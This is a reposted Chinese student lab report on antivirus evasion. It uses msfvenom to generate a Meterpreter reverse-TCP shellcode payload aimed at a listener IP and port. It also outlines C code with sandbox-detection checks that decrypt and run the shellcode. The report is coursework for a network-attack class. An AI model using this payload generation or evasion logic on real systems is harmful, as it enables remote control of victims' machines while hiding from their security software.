20155222卢梓杰 实验三 免杀原理与实践

最新推荐文章于 2024-10-10 09:56:47 发布
最新推荐文章于 2024-10-10 09:56:47 发布
阅读量111 收藏
点赞数
文章标签: java python
原文链接:http://www.cnblogs.com/20155222lzj/p/8796143.html
版权

实验三 免杀原理与实践

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

实验步骤如下

  • 1.先对实验二中生成的exe进行检测
    1073649-20180409093228592-584311846.png
    65款杀毒软件有36款认为不安全
    1073649-20180409093518072-487920520.png
    39款杀毒软件有6款认为不安全
    what??结果好像有点理想,但是实验还是要尴尬地做下去的
  • 2.再试试用msfvenom生成其他格式的文件

    • 1.java
      首先选择合适的payload
      1073649-20180409101817762-720951928.png
      1073649-20180409102221096-2067183484.png

      看看测试结果
      1073649-20180409102346737-1553072873.png
      与exe文件相差无几
      1073649-20180409102441551-116160314.png
      ??

    • 2.jar
      1073649-20180409105027167-668423082.png
      1073649-20180409104915417-1646035308.png
      1073649-20180409105112015-465097590.png

    • 3.python
      1073649-20180409105825490-676355308.png
      1073649-20180409105853485-434583469.png
      1073649-20180409105943204-1486389040.png

  • 3.veil-evasion
    1073649-20180411093852327-713325620.png
    1073649-20180411093924105-130719579.png
    效果很不理想,毕竟是世界知名的产品,早就被AV盯死了

    2.通过组合应用各种技术实现恶意代码免杀

    很无奈,接下来利用c+shellcode半手工打造恶意代码

  • 1.首先在kali中以一个正常的exe文件作为模板生成shellcode数组
    msfvenom -p windows/meterpreter/reverse_tcp -x lzj.exe LHOST=192.168.77.138 LPORT=5222 -f c
    1073649-20180411094734327-196688352.png
    然后将它拷贝到win7主机的codeblocks中,加几行语句形成如下代码

    unsigned char met[] =
"\xa6\xb2\xd8\x5a\x5a\x5a\x3a\xd3\xbf\x6b\x9a\x3e\xd1\x0a\x6a"
///省略若干行
"\x99\xe1\xaa\xef\xf8\x0c\x30\x5a\x09\xa5\x8f";
int main()
{
    //执行shellcode
}

    编译就可以得到一个能够成功回连的exe文件。
    然而会被查出来,所以要用如下代码
    ```
    unsigned char met[] =
    "\xa6\xb2\xd8\x5a\x5a\x5a\x3a\xd3\xbf\x6b\x9a\x3e\xd1\x0a\x6a"
    ...省略一万字
    "\x99\xe1\xaa\xef\xf8\x0c\x30\x5a\x09\xa5\x8f";

    int main(int argc, char * argv[])
    {
    //获取当前系统时间
    //睡眠20000毫秒
    //再次获取当前系统时间
    //将两次时间相减看看是否小于19800
    //如果小于,可能是AV在检测,停止运行
    //如果大于,获取当前进程的内存,如果大于3500000 bytes,可能正在被检测,停止
    //如果小于,查看当前文件名是否跟原先一致,若果不一致,停止
    //否则解密shellcode、执行shellcode
    }

    ```
    就能得到一个免杀的恶意代码了。

    1073649-20180411154610203-175989436.jpg

    4.思考题

  • 1.杀软是如何检测出恶意代码的?
    1.静态检测,将代码与搜集来的知名度高的恶意代码比较。
    2.启发式检测,将代码放到沙箱环境中运行,看是否会生成恶意代码或有恶意行为
  • 2.免杀是做什么?
    绕过AV的检测

  • 3.免杀的基本方法有哪些?
    加密shellcode、DLL注入、RunPE 等等

转载于:https://www.cnblogs.com/20155222lzj/p/8796143.html

weixin_34121304
关注
[系统安全] MyCCL免杀实验
H4ppyD0g的博客
03-12 1784
文章目录MyCCL定位特征码原理MyCCL定位nc实验 MyCCL定位特征码原理 myccl采用遇到特征码就将其覆盖的原理,逐段暴露原文件数据内容的方式将一个待分析文件分成多个文件。 MyCCL定位nc实验 在MyCCL中打开nc文件,选择分块个数为100, 然后点击生成,会在目标文件夹下生成100个经过处理的文件,如下所示 第一段0000是文件的序号,第二段是文件开始的位置,第三段是单位长度。 然后用火绒进行查杀,并删掉报毒的文件,再点击二次处理 这个二次处理就是查看那个文件被删了,从而定位出特征码所
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5357
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
免杀原理实践
cyuyan3hao的博客
04-08 1128
网络对抗技术实验三
实战shell免杀&C2远控&工具魔改(免杀日记 - 上篇)
guanjian_ci的博客
06-05 2963
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过杀毒软件的本质就是防止被杀毒库匹配,代码、工具指纹等等!3、一个好的免杀,一定具备了多方面的性能:防杀软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
20155222卢梓杰 实验二 后门原理实践
weixin_34019929的博客
04-03 158
实验二 后门原理实践 1.使用netcat获取主机操作Shell,cron启动 实验步骤如下 1.先试试win7控制linux 1.win7主机设置监听5222端口 2.linux靶机主动连接 3.成功启动控制台 2.再试试linux控制win7 1.linux主机设置监听5222端口 2.win7靶机主动连接 3.成功启动控制台 2.使用socat获取主机操作Shell...
20155222卢梓杰 实验六 信息搜集与漏洞扫描
weixin_33774308的博客
05-08 121
实验六 信息搜集与漏洞扫描 DNS IP注册信息的查询 首先试下查找学校官网的IP 方法一 使用whois+域名 失败了 方法二 nslookup法 还是失败了 方法三 直接ping法 等了很久都没反应,看来是失败了 方法四 netcraft提供的信息查询服务 查不到 使用http://www.7c.com/查询 很卡,一直没结果 方法五 只好用笨办法,通过wireshark捕获访...
20155222卢梓杰 实验四 恶意代码分析
weixin_34050005的博客
04-17 100
实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c:\netstatlog.txt time /t >> c:\netstatlog.txt netstat -bn >> c:\netstatlog.txt 创建计划...
20155222卢梓杰 实验五 MSF基础应用
weixin_33849942的博客
05-01 84
实验五 MSF基础应用 1.一个主动攻击实践,如ms17_010_eternalblue漏洞; 本次攻击目标是win7虚拟机 首先进行相应配置 然后点launch 就成功了 针对win7的漏洞还是相对较少的,而且大部分都不能用 一个针对浏览器的攻击,MS10_002_aurora漏洞攻击 本次目标机是winxp SP3 这次什么都不用填,直接launch 等待靶机连接 成功 3.针...
陈梓杰问题1
08-03
在机器人定位和导航领域,坐标系的理解和转换是...总的来说,理解和掌握这些坐标系转换、IMU建模以及传感器融合的原理是实现高精度机器人定位和导航的关键。通过深入研究相关论文和代码,可以进一步提升这方面的能力。
陈梓杰 的问题1
08-03
1. **ROS时间戳与Linux时间**:ROS确实使用Linux系统的时钟作为时间源,这可以视为同一个时钟源,因为所有的ROS节点在同一台计算机上运行时都会共享这个系统时间。Linux时间以秒和纳秒的形式记录,提供高精度的...
陈梓杰问题(第6次答疑)1
08-04
本文将围绕矩阵的概念,讨论陈梓杰问题中提到的三个问题,并尝试从矩阵的角度给出解释和分析。 问题1:关于系统初始化的讨论 在讨论中,陈梓杰提到了使用VINS的思路来初始化lidar+imu+gnss接收机系统。VINS...
陈梓杰第七章:作业完成与EKF实现详解
在本篇作业文档中,学生陈梓杰针对第七章的学习任务展示了其深入理解和实践能力。作业内容主要集中在卡尔曼滤波(Kalman Filter)的相关部分,特别是使用扩展卡尔曼滤波器(Extended Kalman Filter, EKF)来解决...
JAVA开源】基于Vue和SpringBoot的高校学科竞赛平台
最新发布
杨荧的CSDN博客
10-10 999
教师功能有个人中心,题目类型管理,竞赛题库管理,竞赛类型管理,竞赛信息管理,报名信息管理,竞赛评分管理,参赛名单管理,晋级名单管理,获奖名单管理,竞赛总结管理,报销清单管理,成绩申诉管理,参赛信息管理,参赛信息管理,往年成绩管理,获奖情况管理。
C语言 | 第十章 | 函数 作用域
ZJC744575的博客
10-05 1269
为完成某一功能的程序指令(语句)的集合,称为函数。在C语言中,函数分为:自定义函数、系统函数(查看C语言函数手册)函数还有其它叫法,比如方法等,在本视频课程中,我们统一称为 函数。返回类型 函数名(形参列表){执行语句...;// 函数体return 返回值;// 可选形参列表:表示函数的输入函数中的语句:表示为了实现某一功能代码块函数可以有返回值,也可以没有, 如果没有返回值,返回类型 声明为 void。
JDK1.0主要特性
FoolRabbit的专栏
10-06 375
JDK1.0主要特性。
Netty 相比原生IO模型的优势
lssffy的博客
10-09 601
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
2024Java最新面试题总结(针对于一些小厂、中厂)
weixin_62375676的博客
10-07 1101
2024最新Java面试题,针对一些小厂,中厂
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值